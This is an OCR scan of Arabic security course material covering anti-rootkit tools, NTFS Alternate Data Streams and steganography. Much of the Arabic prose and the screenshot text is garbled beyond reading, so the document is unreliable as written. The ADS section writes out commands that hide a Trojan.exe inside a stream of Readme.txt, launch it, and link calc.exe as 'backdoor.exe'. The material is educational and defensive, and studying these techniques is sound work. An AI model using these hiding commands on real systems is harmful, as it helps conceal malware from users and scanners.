jAxl\ ^aUaill ialLd ^ O^*-! L - J ^ J ^xlaill ial_L<J ^UaijU (j^xaill j& baCkdOOr J ^—^ 1 jjll ^jc c Luj£lj ^1^. j±\ iAffc\ 

(JjI^j L_flj^xj3l (jc A T nsJ! CjUjjjSi Lpa*^ cl>^ .AijUJl ^j^Jj A-L> ^ uJI jj jJi^^ll ^3^'^ L * ^ m " s L>^ ^J^)*-^ 

^jl (j^-GJ j j^l jl (shell script) a j^ill ^-W^^ ^ ^ . jUl^ ^11 Sj^j ^>f^ j l!> ^ &L> 

jjjj j>i j>i^Q ( ( - ^fij L-jl&illj 'binaries r 1 ^ ■ J ; <-dl^JI CjIjUJI Ail£3 JaLii^VI ^cjouII Jxill ^Lja>JI j^^l 
^Ujdjl 4 1£ IVEL) 5sum.exe .^—^ ^j^^ cjIj^I Ajja > ^li^ll aIloj j£ jywi ^^^j j^Vl (j^a^il ^akL» ^Laul ^^13 .aj 

4^^joj (J^a^a ^xil^>J ~1 I^JLujI (j^J Cjj^)3l AiJa ^li^ll jJJxjll ^1 Cjj^. AiC. djl£l^JjVI ig\ A^o^Ldl (illij CjI aLJ] ^ &jL*aJ 

,*L<il^Jl djUUill ^ LaLjl^Vi ^cjoilll Asu ^jjJ j-d ( L J lall 1/ (JjT.t.'tu] I ^UaJ dllJJJ o^lcj 

jA^d jjisJl dUl jjjoiaII ^5 ji •^•^^ 

■ L^ ^ ^ ^ - a ^ ^Uaj a I lkll> a I 

SjiWiti j JjxjujIII ^aiail patches ^^^^ 

,AJJJJJ Jj3 <JllS Cjj^)3l AjJa A^^^ ^illj <l3 DjUlkl ^aJ dL>.>i jjjj] I AjIa^JI ^x»lj^)J <jl ^£U3l 

. JSVl djIjln^VI I^aj ciLauull Ls iuh - 

dULJI ^jc t LSSM j^JI Sj^jSII ^ijl^Jl c^F-Secure's Backlightj 'Vice 'Rootkit Revealer 
https://www.facebook.com/tibea2004 A^Ia ^^aa^a 



Anti-Rootkit: Stinger 

http://www.mcafee.com/us 
^UJI ^Ik^l *\\ Cjl^j^ill j tCjLaj jj^ll j t jUiajVI dli AiniJl djl v> jlj til^Loaj McAfee Stinger 

^<»l^)i3l JjS (j>i i ^ ikiLoiV Aij^stxJI ^il j-<JI lS^^j < cJj? ' ^ ^lSj*^* ;<jjL^J! cjUIaxJIj djj^)3l L Stinger 




hut 1 *s l* **" 




l * r **erH- — ^ — _ — 








R RtQrtfcy 










r Ma 



MawufcC **** 




com 



Anti-Rootkit: UnHackMe 

http ://www. greati s . com 

t <d£ d jjll <J1g SjLjall ^1 jJI ^\ jj\ <JI jjj ^ til^cLoaj ^ill j ci£ Cj jjll <^il£-<J ^Ujj (JjjLojV! ^ UnHackMe 
j^j^f^^ c> ^ ^jj^^ ^ UnHackMe c> cr^-^^ lP 3 ^ .'j^ f^j ^^-jj^^j 6 worms j 'o^jj^j 

'Reanimator UnHacklMe o^^ 3 ^ . L - J ^^^^ ^j^j cJi^l m » c^^- uj^ ^Luij Uu» tt^L (j^aLkjl 

(JjJjud^jll ^C>il^)i3 (J^a^S I^I^JjojI <LJ J 

.Windows c^! j^j^ jU^ o-^^^ ^ 

(1^)^. ^l^j tdjLujjjjiillj 6\yormsj 6 l>^jj^j ^j^^) ^^^^ ^ <li±kj| cjI^IloJI ^jjj 
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Features: 

■ Precise double- 
checking for a Windows- 
based PC 

t? Instant tracking of 
malicious code in the 
system [rootkits, Trojans, 
worms, viruses and so on) 

Does not slow up the PC 
and it is compatible with 
antivirus programs 




* -A leiroi'-.2*1> Dak.**™** u 

i#irVl n^V . 

i O rtwiHl Aim „ . i** 11 *™ 

^ Ml 



H_U CSIrojm Fi* [sB6K^50H .. 

lit. r .mnf.*."* Pf*fl iMtepVru 

i»*_S/ C:1lru T g»-ih«.C<«iK , fii*Tii.. 

e- . • ui. i. . I - i ■ J J 



S'l.|L'.l.jnSITl]Hri.,. 

^'ftTHU'iCiriBirXnTi ... 
■ t *^TFWiririHiiTjin* 

Iftcinww*, n r ininn-i W . . 

lij/c-ar^.flcrjurr.iM.. 



*P»... «J jQ 



i**tju-X*L-- 
HOYjJjCM--, -4*NBr»,, r |to || 



Anti-Rootkit: Other Tools 

tS^I j^)Ja tCjLujjjjiillj djj^)3! JiLd ojLJall <ali^<J! jj^] a1\ jj Jc- (il^c-Loaj 4_JU3I diS dijjll ^il^> clAiLilaj 

Virus Removal Tool available at http://www.sophos.com 

Hypersight Rootkit Detector available at http://northsecuritylabs.blogspot.com/ 

Avira Free Antivirus Tool available at http ://www. avira. com 

SanityCheck available at http://www.resplendence.com 

GMER available at http ://www. gmer.net 

Rootkit Buster available at http : / / do wnloadcenter . trendmicro . com 
Rootkit Razor available at http://www.tizersecure.com 
RemoveAny available at http://www.free-anti-spy.com 
TDSSKiller available at http://support.kaspersky.com 
Prevx available at http ://www.prevx.com 

iTFS Data 



CjUUJI djllaii ^ jjjjI Jo s^lc <j jl^j NTFS ^ L 6 (File attribute)*—*!^ cjLujj ^iLjaVU 

e yr^' (i^ j c (security descriptor)u^VI j oj <*j^ J jVl <^AjIjJI jaj .(Data Stream) 
SjjSioll cjUUII ^> >l ^jj ^ (Alternate Data Stream [ADSP ci^ .cjliLJ! J^b diUUJ! 

ADS J Alternate Data Stream ^ U NTFS ^ULJI ^ 
<jjou]U Transparent cJ^^ -^j^^ I^a ^jj ci (jjj^ c kL> ^ djUi jlx-^ iajj ^1 jJI (j^asu 5^1^ 3 K > f >i ^ ^-W- ADS ^Uijj 

Cilia jjj^UJl J JjUui J^i-« J 1^1) t< l ^jj djj^ (jfc j±£)udJ ^aLkJl HFS f^ 1 ^^ dlliLJ! ^aUaj jjAlijll ^1 jj] U^ajl I^I^JjujI ^aJJ 

J) o^*-* 2^^^ ^ c al^li iajjl Uiajl j tSiflUlt cJ^j j t al^ll jjj^jl ^ jii^Lo J ^^kiaaj j Resource Forks ^ 

J^j .(stream) ls ^ djliaii ^.jj qu^L^VI Stream c> c> ^> NTFS J ^^^^ u' ^ ^ 

: JU3I J£ai3! J U£ .Stream -Jl ^ ( '^^ j^ o-^^ 1 ^! i> Stream 
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FOO.TXT 




b (aSjLJI J£ai3! J L£ null) ^ uj^ uj^ ^Jal jjaVI Stream -SI j ^ ^jj Stream -SS 

. ":" jjilaij axjj t^LJI axj Stream -St ^ <j^J] ^ ls j^' Stream ^I^IujV 

:Jli. 

D:\test.txt => Default Stream here 
D:\test.txt:OPS => Stream called OPS 

aj^iaj q] (jl^j V ^n^j U c_aL (jxuia U jlx^ ^ILkl ^fi^ ^^S^j ^ ^-al*3 Streams -SI lP 3 ^ ^ Explorer jj^jSI ^ ^xiui* 

D:\> echo mypasword > passwords.txtremail 

(j^jja o^lLkl U jt&ia] ^ l>Sj j^l Stream -SI ^ bVun l passwords.txt ^1^31 ^ ^5 lil UJa 

. emails UULijl ^Istream 

D:\> more < passwords.txtremail 
mypasword 

J^b/^i Ci^uS jSI j c_flL3! 1$jj£ jj cr^l ^-Ml t> £jh g?l > (Alternate Data Stream [ADSP %lJI cjULJI 
JSI cjUUJI jto ^Ui Jlc iSj^. u^jjU lS^? o-^UJI (Master File Table) Jl ^a*SI J j^ .NTFS ^ 
tilSi j <j <L^al<i ^ j a aUSi J ^iiuuS (ADS) ^^Sl ^^Sl ci^ <^^S ,( jS>^SI oajsSI cJ*^! j " q S^l U^jl^ 

g^lj Jj^jS! J (Alternate Data Stream [ADSD ^AjIuJI .<^t Jj^ i> 

.djULJI ^ Jj^iSI jj J j^a jSI dAiUjj tcJ^JI ^jujI 4l1jIaK3I ^(Attribute)^-^^! <-S^ ^^1^13 A-iL^a jSI dAiUJ! 
^ ojUjcI (j^j ^.ijiii c kL> l\l c — ^ 6<jU^JI (jj 3 o^ 3 *^ J 4 c aL&li <!L^. ^iiiS ADS S^IiLujVI ^li* 

_CjliLJ! a!Lo StaV l^jJajc jl tl g tl^ijUaj jl jjiisu (jj^ ^<Jl CjlilxJl Jl CjULiJ! (jj^J Jc oj^L<Jl ADS 

l^iUiu£l ^jj Uiiiii ^iJ ^l^uaSI j (jjii^SI ^IkiSI iL^al jiSI CjI j^l jl rootkits u^-U-^S ^ ADSs 

^ij^aj CjUjaj ^l^klujU Igic c qui^Sl ^aJJ ^jl JjVim^l ^ ADS ^ ^^iS^Jl .^aUaiSl J JJJ^ (J^ 

jla t^^aVI t^LJI ADS -^j/ti^ jj .(Windows Explorer) jj^jSI jl (Command Line) 

j& c aL&Si jjiisu <jl jaxj ^iSI ^i^. jSI jJj^JI .ADS anyfile.exe J^SI -S 3 ^ c * q S^Sl Jj^aVI ^>^>SI j^-iaj ^ jjuj c aLxli 

s j^ 3 uj^ 5 cjl c^SI '(TimeStamp)^ jSI <yLkSI Jjaxj 




Inj-c-ct malicious 
code in the existing lile 





Hacker 



Existing File 



NTFS F tie System 
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c:\>notepad myfile.txt :lion.txt 
c:\>notepad myfile.txt rtiger.txt 



?NTFS Stream ^ 
■ m U\^\ cjI jkkl! ^Uj) J^U ^> cillij NTFS Stream ^1 

.cjUUJ! jkJ 10 



<j| l_s jjuj myfile.txt c aL&li AjjjI 

.Notepad ^ [myfile.txtrtiger.txt] <-ikll g2i &* Stream cfe^U 

Notepad Is stream compliant application 




o Launch = : \>notepad ntyfile. txt:lion . tMt 

Click 'Yes' to create the new file and type lO lines 
of data s.^ve the file 



To modify the stream 
data, open document 
'myfile . tjcfcitigr 
e xr > txt' i n notepad 




«• Launchc:\>notepad 

Enyfile . tst-t : tJ. ge r - "Cj-tt 

Click 'Yes' to create The new 
file and type- other 20 lines 
of text Save the file 




^ View the file size of myfile . txt (It should 
be zero) 




NTFS Stream Manipulation (Hiding Trojan in NTFS Stream) 

: $jtfjt Ci\ jkaJI jjilS jjjla <jc NTFS Stream 

:(Stream) README.TXT J\ Trojan.exe ^t>i^ c^l - 
c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe 

:(Stream) README.TXT Trojan.exe i-iLJI - 

c :\>start c r\Readme.txt : Troj an.exe 

:(Stream) README.TXT 6- Trojan.exe ^J±* E l >3«V - 
c:\>cat c:\Readme.txt:Trojan.exe > Trojan.exe 

. [Cat is a Windows 2003 Resource Kit Utility] i-Uajal* 



Location r\ 

Trojan.exe (size: 2 MBf 



Maw? the can tents of 

Trojan.tfjitd to R*d<adiru*_bu 




^ == ^ Location c:\ 



Readme >txt (size: € r 
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Hiding Files Using NTFS Streams 
:<LlUll cjljJaaJI jjIS calc.exe CA^J NTFS Stream ^IxuiIjj U * till jjjj LLSI <j*ajij 

C:\windows\system32 jLuwJI ^ calc.exe <-al*JI ^jSj ^3 C:\ o^jW^ magic cr*^ -1 

.C:\magic ^> J 1 

4^Lk> ^ tsUi axj ^ <C:\magic ^V*^ f t>j Command Prompt j*ljVl ^iL ^ jl> -2 

.Enter <ija ^ jJjVl ^ notepad readme.txt jJa*JI 
.L_aLJI ii^j jlc. <ua Hello world j^Ji ^ j£> notepad ^i^SJI jj ^ ^ -3 



C : \magic>notepad readme.txt 



I readme notepad 



Fie Beit Format Vtew He p 

Hello world!) 



-|njj£| 
-lal *l 



"3 



zl 



.Command Prompt j*ljVl dir jla^JI <^LL t> readme.txt ^ -4 

.cmd j^ijVl y-i y-MI ji^JI A^Uia J^U <> ^ij readme.txt calc.exe -5 

C:\type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe 



C = \nasr i c >n o t= e p«i<l re^d ne - "t xrt. 

C = \imag ±c >rt ± **■ 
Uolune in di*iue C h^s no labe 1. 
Uuliin*? Eer^i^l NunlM^ is 34C9-D*?8F 



09 



05 : 39 AM 

nn 

2 FileCs) 
2 Dir<s> 



<MR> 
<MR> 

188 , 416 c a 1« _ «= 

12 readne .txt 
±8 8 ^ -<12 6 but e s 
-1,377*677,824 bytes f»a 



C:\nas lc > 



. ^3 Igjt readme.txt t * a ^^ s^j^aJI 3aLuiaI1 a Uoi jU, |a& J laJLml asu -6 
.readme.txt t ^^^k (3^-^ jjajuJI J^Lk ^ U^ii dia aA\ a^l*. ^ a*j ^3 UjV calc.exe t dlj£ *j ^jVI -7 

.readme.txt calc.exe J*jj lU*3 ^llij ^JUll jkJl 4^Lk> ^ jVl -8 

C:\ mklink backdoor.exe readme.txtrcalc.exe 

.Enter J> j& ^ " 9 

.<jjojUJI J^-*^ <^ * j*^^ backdoor <cUSa -10 
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05 : 39 An 

= ^ l fin 

MS DM 

2 Dir<s> 



<D1 B> 

18 8 , -418 calc . c 

±2 readiw -twt 
188, 42 S Jb v t e s 
4,377,697,824 >> v t e s. frt< 



-inf ~r 



; ><*±ir- 

in d *- e C 1-ihbls no l^lbel, 

Kunher d_s 3*4C*? — D78F 



Directory oF CiSfugic 

W^12^2012 05 =39 AM 
»^12/2ai2 BG:39 An 
ll^l^^ Id felt* HfeiSl An 
*9^12/2B12 BS:44 AM 

2 Fx lc<s> 
2 Wir<s> 



<MB> 

L8S,41b calc .exe 

188,-128 bytes 
4,377,415,&88 bv^es F^e=< 



C:\mrtgir >nkl ink readme .txt :calc .exe 

:. yiri puj i 34: i ink i: rtttrtl I u r kUuur < <^ ™ ™ ■ ™ -> > re adne . txt : calc 




I - I I 



Ntfs Stream Detector: StreamArmor 

http://securityxploded.com 

j&j UUj ^-aUJl ^Uajlt <> jjj La all (ADS) J^H CMjjII Jiti ^ t LSSll ^ cil^LoiJ sbVl 

sUauJI Streams l£ u& ^£11 j <i^L ^U=u3! ^ jj£i*3! ^-^^ill ^ cil^l^j dii^ Multithreaded ADS scanner 
ia-aj ^ l_Luu£I (ji*^ Stream lP 3 ^*^ 4-pl*lt cjUUJI ^ jj.ui.a11 cjUUJI l-aLul&I jg > >n aj .c*L ^aL=JI ^U=ull 
.Advance File type detection mechanismM ^l^i^U < — ai^Al Streams Cf- L.L2S1I ^ j^IS -ol L£ . jjl 
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NTFS Stream Detector: Other Tools 

t flju&ll CjIj^I <a jjni^l cjlSa^jll jo l_l^3I b&S <Lj .^jjjoJI J 3^.12*11 NTFS Stream * cjIj^I ^ ^ja»JI c*1Ua 

NTFS Stream 

ADS Spy available at http://www.meriin.nu 

ADS Manager available at http : / / dmitrybrant . com 

Streams available at http://technet.microsoft.com 

Alternatestreamview available at http://www.nirsoft.net 

NTFS -Streams: ADS manipulation tool available at http://sourceforge.net 

Stream Explorer available at http://www.rekenwonder.com 

ADS Scanner available at http://www.pointstone.com 

RKDetector available at http://www.rkdetector.com 

GMER available at http://www.gmer.net 

Hijack This available at http : //free . antivirus . com 



STEGANOGRAPHY 



CjLg J*-* jl 4_juj jaLz e-Ujail Clljl£ f.\ jjoj 6 jjliJl CjI^IIaaJ duaJl 4_jaiij <J jjoiJ ^ (J^asu tgUlmj <JjLuj jll jl JjJaJl ^^Jfc 6jJj£ 

tAjjoi^Jl CjI^ILoaII (J^-I^aj c3Jj ^-^J^ t — J*^l <-<u3 duljj 44jjLg jlx-<Jl jj^xj ^.auij Lg jl l— LjAaJl jj^aJl J j .4-iJjjaiLaJl S^_^.VI 

^^jll (JjLuo jll j t^xiUi J l^jt >>i jj I^IiLqj V (j-ac- diL* jl*-<JI ^likl (j^j Jll <JjLui j^I <J-^ J i_ laoll Jl La li& j 

4_iLgC ^ (j&ill Jl J-^Ll} La <Jjl u!^ 6L -)L* s-li^.1 (jc Cllj laJI -^C-J .^J c ' J^ 1 <LjaJ Silk-a CjL» J c L!a£ (j-a clA^ 

^^isu V 11a j£l .(key)JI j' ojLill ^-LiL* ^l^ikiuL V] ^ j^A* jj£ csj^l 3. i .j.>^a U^j^ jl (Cryptography)^-* J*-a1I 

UK CjUUJI $-la^L ^ - galj j^l J cilU& t^al jll J . j^*-!l <^La *La^J Ig-!^^ c>» J^ * \^ <Lja3l j& ji 
.Steganography^- 5 ^ ^ j JjuiVI (j-a JL^ajVI li& jl cjULuII ^3 Qftg^ La Jj^al jlll 

.aJUII JJ^joJI J <IajaLLQ AijjIaJ <liu/VI J jU.Loj ?lg_Lo hq^Ml j l^iluijSl 

11a jjc I^SSj ^jia^su ^g-^j laj > o j J^-^ djLo jIslaII ^ 4jiqMl j\ <Lj]aJI djLd jIslxJI e-likl jl Steganography ^K 

(J^3 ^stJ ^jl (Jj^ (j-a^juj Jl (^ JQ^ a JJJ^a C5^" J') ^ J 1 ^ (JjIjujj (JU 4_ljj^)J^3l Sjjj^a ui ~ iklujj ^3 4(JliL<Jl (Jjif^J J*3 

^Lixll 4_^jJalj ^jjc. (JjLoj^)J jjj^all 1 aIaj ;ljjj^a Q^^Lih q±> uJI ^jl JaJ ^jLkJl ^j-d U -0 

^jjUjIuj /'steganos''^ oxEyavo^) ^-^1 c> "^^^l ^^1" J*^j c> Steganography <^ 

ul c> ^iikJI jll JLaj J ^jxia^ .<jUi3l J*jj t Jl '"graphei",( ypacpfj) ^Kllj ^ JaiJI jl c ^x^ll J*^j 

CjVjUa Jc <jjjoJI 4JLaj^)3l Ij^UcI ^jc-VI ^Ui^ ^ji^jjlj l^Jj <-<»j^a oj^sj Aijja .(JjjLujVI J^j^ ^c^^ 1 

_<j3ljajj J^ (J 1 £xul3l AjI^I jl ^Jl ^*J^ 6 ^ jj^aL<Jl ^akjuall Jc^ 4JLuJ^)3l (Jj^aJ (j^J .^ulll <a±laJ l^jjaij ^1 t< . Lula II 

L5^H UJ^J^ I (><1 J^ _^i!aJlj U^jj^aC (JjjJjLLaJ t^^^gjuall (_>ia3U 4 Jmi^ j dljl^ (jl j t^pa^sJl (Jjoiil ^^kl ^iljajj ^J^jC-VI ^ iklLujI 
4jujIj 6J^)3 ( Jaija to^stjuj (JJaJ <J^- Q ^1 IaAsu _4_jaijLJl (_>JJJ^I J^ ^^^1 ^-!Ujj^)3I (^jujj) ^aJJ ^aJ t^nxJl (JJJJJJ 

J j _^JLuj Jl I Jjj 6^Asl!I (JjjIj J^ J^-VI I^A ^ajli ttilLiA Jl l!^^ J .^>^VI L_flja]| Jl <j jLojjJj t^l^Jt-d AjjjoJI 3JLojJI j) 

^JJ^JI Qjjf^ a\\ j ^XixJI CjI j^I ^aAl ^.1 (^JjoJI jfiJl jl£ dlU^Jl JJ^asJl 

djj^Ja Jll d iVqj; Wi\l ^1 q\ .CIjULJI ^ A a j o^j^c ^1 jjl ^djLalx^l j CAiUJ! £y* f^y l$\ ^li^l ^ 6 c ^ajl ^JUJI J j 
^l^<JI CjUi jlx-<JI ^jj^^j] a laJLujjj jl^aJI (J-iT.uij Aic. Ujlitj Jjtij tL-iL^aJI ^a Jll (Jkb Partition j^- ^Uijl ;4_u£i3l ^ ^ilj 
<o]UL J t "Johannes Trithemius"c> j ^^J u^j^ c> 1499 <^ ^\^^^ \ ^I^IujV JjI .UjU^I 
jjlsLxi ^(^-^ ^-jl Jc- j^Jaloj JjLojJI ^jli tUi jac j .aj^joj lijlsu Sjjj^a Jc ^^31 <jU^3I j jjjjuall (jc"steganographia" 

. "cover text'V^^ o^" l$ J &t ^J* J J 
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jjjjujjli ^^ic ^IjC. jjUulaJl 6 (jl _<j^aL^ 4_lLai^)3 4_ijj>JI jjJajaJl Qli ^>f=^ ^J^^ UJ^ all 4_lLai^)13 lllSUll a jfrLall 

I^jjI^ (jl^J ^JJ -^D* J^P ^A^^ (jc ^)Iaj3l (J^asu 4^ jjJa o^iu^l <JjLoi^)3I .^Lu&VI ( ; >>laJ V l^jli ^aj 4_lLui^)3l ^j! j& O^^Jl 

Jjujljlill L_fll^)ialj <!Luj^)3I aaJ ^jl ^IjC. auludl] (j£-aJ t4JLaj^)3l (_£ jla a jjLudlll ^ <l^J c£^I dlS jll [J] jjjjaull ^laj ^^jll (jl,Ji3l 

Liia o I j^jj ^jjj^IVI cJL^liVI jj o - <alj (jl (j^j ^^g^^)!! ^Ijc. ^UulaJ! jjojL^JI dAiL> CjLg jLlxJI ^likl ^Ijc. jjUuluJI <J>ujjj 

t ■ UjudJ CjVIjujj^U 4_i3Ha JaLoijI S^AxlxJl kjl ■ u j]| daliLa -( J j£ tajjj^ t flLa < IiLu^q L_flL» JLa tJSUll Jajui jll (_£ jlud-o 

L_fl^p. (Jjlljl tialaill (j£3 (piXGl) ^Jakj (jj3 lS-^SJ t^jiLa JJC. Sjjj^ ^AaJLujJ ^j) <Jjuj^<J clA^ 6 (J^^ } & A y*> 

_a all ^islSU AiLuU^I (J-al^xJl ^)JC. (j-aj LV 1 J '"^ ^ j I Q J°^ jJJxjll jj^J 1 0 

<Lla jjc. j <-<i j^i^ ^jj^il <Lg j1s«-a3I jjq ujj jl > ^alklj ^^-isu j Cryptography jjq^l ^llaj^axj ^axu jl aj^3 j^^I 
,U^iij <jLaLi3l j^^^ ^ j^j (^^>^ (jc- t "S^o*-^ jix-<Jl (_5-^*j ^illj Steganography u^j 

ti!U& (jl Ai^stxi ClJl!i3l L_fl^)IaJl ^ilaJjoiJ Lo jlx-o JJ° ujJ AiC (jl CjU» jlst-<Jl ^liklj jjjjujjll ^jjJ ^.t.»Lt.»Vl (J^Jl (jl (J J^l ^llaiudJ lil 

(jjJC ^ jl (j # U^>^ ul (jjlJ ^aJJ (Jl >^>M 

C-ljj (jxi ^aJJ (jAJjj ^jjAJ (jU-ajj tilLiA (jl jl ^liiJl ^q-N ^ ^^^joi tilLiA (jU lUIj (_^V ^alc liltiA (jj^J V CjUi jIslaII ^likl ^ 1 <ft 1J1 

. jL^ajVI liA ^U^V U kljai j ^1,^1 ml 4jV (JjJI J^3l 



Security Systems 



Information Hiding 



Cryptography 



Steganography 



Linguistic 
Steganography 



j 



Watermarking 



Technical 
Steganography 



Digital Images 



Robust 



Video 



Audio 



Text 



Fragile 



imperceptible 



Visible 



Fingerprint 



;(jLudjVI (Jjl^J CjUaLaJl Cjl^l^ijl CjVI^. <^9 l-<^ lu^-^j ^ ..^ (^5^ T ^ 1 ♦ cJj^ L_JJjoUJ 6^aA JjiC. jl CjUU^SlSI jl CjllaLaJl 

(jl (jj^ 4^31x13 <LiaJ| ^JU^jI ^ 1^)31 tdjlcl^ill j CjI j M j^p*^^ uj^^J (jjjq^ > ^>ll j (jJjajlj-all j jl t^J^VI t_j j^JI ^Ijjl j 

U L-Luaa^fl 6(J^^ >* 100000 ^ C5^^ J '^W^ ^^Vl UjJl (jU J>^i^ U tdi^UJl £>ifc ^ Jlio j 

^ (The International Center of Human Rights Research) u^V^ c3j^ <^^l ^hi^ l (jli(Korhorn) 

^ j£juJI SU^ ^^ic ( 1 lafll ^ j diUi jlx-<Jl f^lc dllj^a^3 t jj^unll ^ ^jVqlll oi^ ^I^JjojI (Jj^a (jC 6(jUc J J^juJ (j-d td^l^juo 5000 J^- 
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tAjjjjJ^lVl OjL^jll J CjLdl^Jjajl IgJ q\ j&j laJjudj t . UjuJ ; jjl^Lll ^Lu&l tA^jSSll £>i& <J^* J CjL^jVI (JajujJ Ull^. 

^AaJLujj j .(Watermarks) ^j*^ ^ j> 4-jj^II dLa^^laJl \ ^jlkulaj j^ l_ . j^-1 a*j U<>jj 1$j ^Lu&VIj tl^linlaj •jbjj Jll 

till,j£j tlA jJC-j J°J- o J-<Aj <J^aLkJI CjUI jLjuiVI '4-i^j£ll CjULaO j>» ^Itj ^A-Lafjjll dil aaloll JjjlaJl Jai^ dAjLaO J Sjj^VI 

t^tUxJI J^ta ^ jj jjl <*-sj*j V *u£3 ;CjL<»^Isl!I j ja. jj ^isu ^ ^c. jJLa .CjjjjjVl jjc- ^AJl Jll £lx»1jj11j jjj^II 

.^cjouII S^lclj tl^jlljl ^aJc L-ixj ^ij JUlbj t jjjjuall ^-ULd j jjuJ! V j t^lLkVl J ^klail (_^ilt ^c-gUjjII V j 

Application of Steganography 

dlLa jlsc-all j-a 6 jj-tJl La Jc AaIsu Alkl<Jl j j^.1 Jl AlSalo j-a jjj£ J c allkj (StegailOgFaphy) <^Aj* jl*-all e-likj (JJJiaJ 

; JV1 Jc- (3flaJJ dlLa jLlaJI ^ILkl ,lg-La S^UludVl j 

Access Control System for Digital Content Distribution 

-L £ jJa all (j^V 'dj-uiLft' l^iilj i'^L&a 1 JjSj ^jJaJl CjULuII i'^aSj]) ^j^aJ) £0j^ ^Uajl 'Jj-ufl j]| fUaj' J 

^IjsVIj ^ j^j J°j'" j-oll CjI^jjuj ; JllxJI J-ijjuo Jc „ (Jjii ji&l djjjjVl <£jjuj jjc- *>jj£j ^ jjj 4_LaiijJl dAjjla all di^jj^l <^ jJl 

Igjujjj* (j^-aJ l—Ajjla all ^jli 64_1L^J1 J .cJ^I J' "ShW^ ^^A^ ^ a 1 ^ ^ ^ ^-r^J^ aN °'^ Jc- .JJ.JJ>Jl l^-ft jJl (jc 

^jjjiill j 6^<JL^J <!L^.^ Aj^IslSI C_JJ_ail £J jjJ jnin^ ^ ^ L-IjujI m V ttillil _4 jj^ jll/^ jl jll (jjill (JjjUII Jc ^ jLoaiillj 

^ji (j^j Steganography ^>^>^ ^ saixjuj ^jjSj l_a jx* tdiji c Jliijl cJ^j c5 jSa^SI u>ib ^ jSj ^ jjuj Aikjujl jj ^ill j 

c> yr**J^ l^j 1 ^^ (yjj^ " (^4cc^,s Control Systern)dj±^ <&j* (^(prototype) JjVl ^i^l jjj^j 

UU\ tiA aJUI! cjI jJaiJI ^ jJii .Cij jljVI J^U 

clc q , J <U£ CjI all 

^jAjja^ll f.lc jll 11a Jj^^i tdjl^l^Jl Jj J jj^a jll ^jjLLft Jl ^A^Lu^all Steganography s- 5 ji^V 

m A i^aL^Jl 4-JJjll Jc ^5 jla all 

^)judj ^Ijj .^llj<-ll ^L^Jl ^i^- (J lA^jjuljj <lq*lLa <L JaJ jla all (*J^ j*^ all ( ; l^L ^> <J <j^aLaJl 4-lJjll J^ "2 

jl) tiULall jj^J 6<1UJ1 d^A J Ij^Ui Jjill ^XaxJl (>» all J jj^s jll CljUlSa i^ULJI JljJ 5JLaJl £>i& J -3 

.(jLall JjlLd jl UU^) ^XixJl Jj lg-AJ^J j J jj^a j ^Uio *L^Ij (V ^ 

Steganography File Systems 
^ j .jiAA ^\ j if\±±i jj tjj^ j^jI ^jj <^jjS1 Jjl ^liloll ^xJajl c> ^jj ji Steganography File Systems 

Igjailj Jc 4_jj1 juitJI Cjtnll ^j-d !)L^1 L-fllllj jllj ijtill ^ 11 dlli dilil-all 4_LaiLaj al laJLujl j ;CjULii3l ^li^-V (j-jlj > uJJj ^jjjajjla 
^jxiVI CjUjlabd J ja. jJ ^aisu V (j^lj <^^VI CjUjlLaball JJ° ^ <^1^ L>^^^ djUjJjabal ^ojujJ <LjiaJ l^jJajfl ^aJJ jllj '(veCtOr)^— 5 ^^ 1 

.tSlli J ^jfiauoll CjULJI j AjjI jj^xJI CljUilU ^ Jx» J^l£ ^uai jt « JcVl 

j^ 5 ^j^? (4j V djULlI ^ j Steganography File Systems J^' j Aijjlall 

jaJ ^JJ Ulk^ J^j tJj^J jUll A^IjjUI ^JalLoll SjL <Jj^j S jLlall CjUloll— UjI j*k^ ^ij J^l£lb Jj^j jUll jil 4 6 jLla 

jj£j* dlliLall ^al jx» jli ttilli Jc oj^lcj ,4_iixill Sjiuioll CjUIaIIj IgJ ^^ix^ V ^J^aj (JJJ jjJ/QjH 4_1^joj <9JjIa Aa. jJ V 6 jjuJJjUll Jc 
^j£-oJ 4Jl J^J Ai£jaball Jj c^^JJ I^J .JJ^y^^ ^al£ ^Lxiljjll Wq^ A ^llaj A-li^ a jj^J CjliLall ^1 jxij ;djlil-all ^JjlLa <Jjfj j>» AijJLxi 
.CjUIjjII Aflfl 4_j^aj3 JjISjI 6^A*lft (jSLftl J CjULall <il£ 4_jIj£ (jJjia (jc 4_L^ ^jj I^Aj ^1^ <CjjaiJ j^axJl l^jJajU djULall ^jjS 
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Media Bridging ± 

jl iiLuiaH t aLa (JiLo t (transport layer)cJ^^ <Lia J jjj£3VI djVU^ajVl j^J^ L — ^ 44_La3jl diL* Jx-JI ^ILkl ^l^kiaal 

j& ^.1 j Jl (diljUJl — W)\ > u jllj CAjLJI (j* (jJC jill J 6 ^ A L>^ ^dj^^ CllLa jlx-<Jl ^likl J^lllaJ <aiaixJl £>i& J 

Jc (_£ ^ 4<Jtl<Jl <J-1JjuJ Jc 66Jjj^3I .L^^)^ 1 ^ dlLd jl*-<Jl (jlaXJJ IgJaJj ^aJJ (^Jl t^qjni j>Jl t^liVI 6 JJJ^ll) (Jj-0 W)\ > 0 jll .4.1A&I 

;CjLg (j* Jj Ui 
.physical object i> cjUJ*JI o^xjj Sjj^ll jtjjc -1 

_ jjj^axJlj 4 ^ laJLmASi I^lgI^II (jc djLd J*.* -3 

liflj la all dAiLull (J A'SJ C_fl jjol jlLal/Jl CjULlJ Vjl I t 1>J (CjLq Jx-<Jl (J-^JLJ J Aic ;4_iLosl1I C1jIjuj^)L<ia]I ^3 

,1^.1 (_£,i3l jj QlAjJaH £C^U^)J ^I^JjojIj AjJjoj dAiUj QlAjJaH a J 6^aJ /ajLja JJC. £0 jlauJl (jj^J (jl ^irjnj .(jj<u ^>Ml <«— 

£C^U^)J ^Ia^LujLj (ciL (j^aLiJl L_fl Jail) ClAjLJl l^-ljVlml AlC- ^UixJl (J^axJ £A t . lla Uia. (djLd jIslxJI pli^j £L^U^)Jl ClAj 

^•ULd' Jl ^ll^J <!LaJl £>i& Jj ^Jjjjuall ^a J^i-G Cilia (j>* ^alaJl ^IjLall) £-UL<J! (JJdiij *LL<uJa^ ^—^-^ ^bjloaV (^>^-l UJ^) ^Ij^^ 11 '! 

.cjVI^VI J o^jli^l 

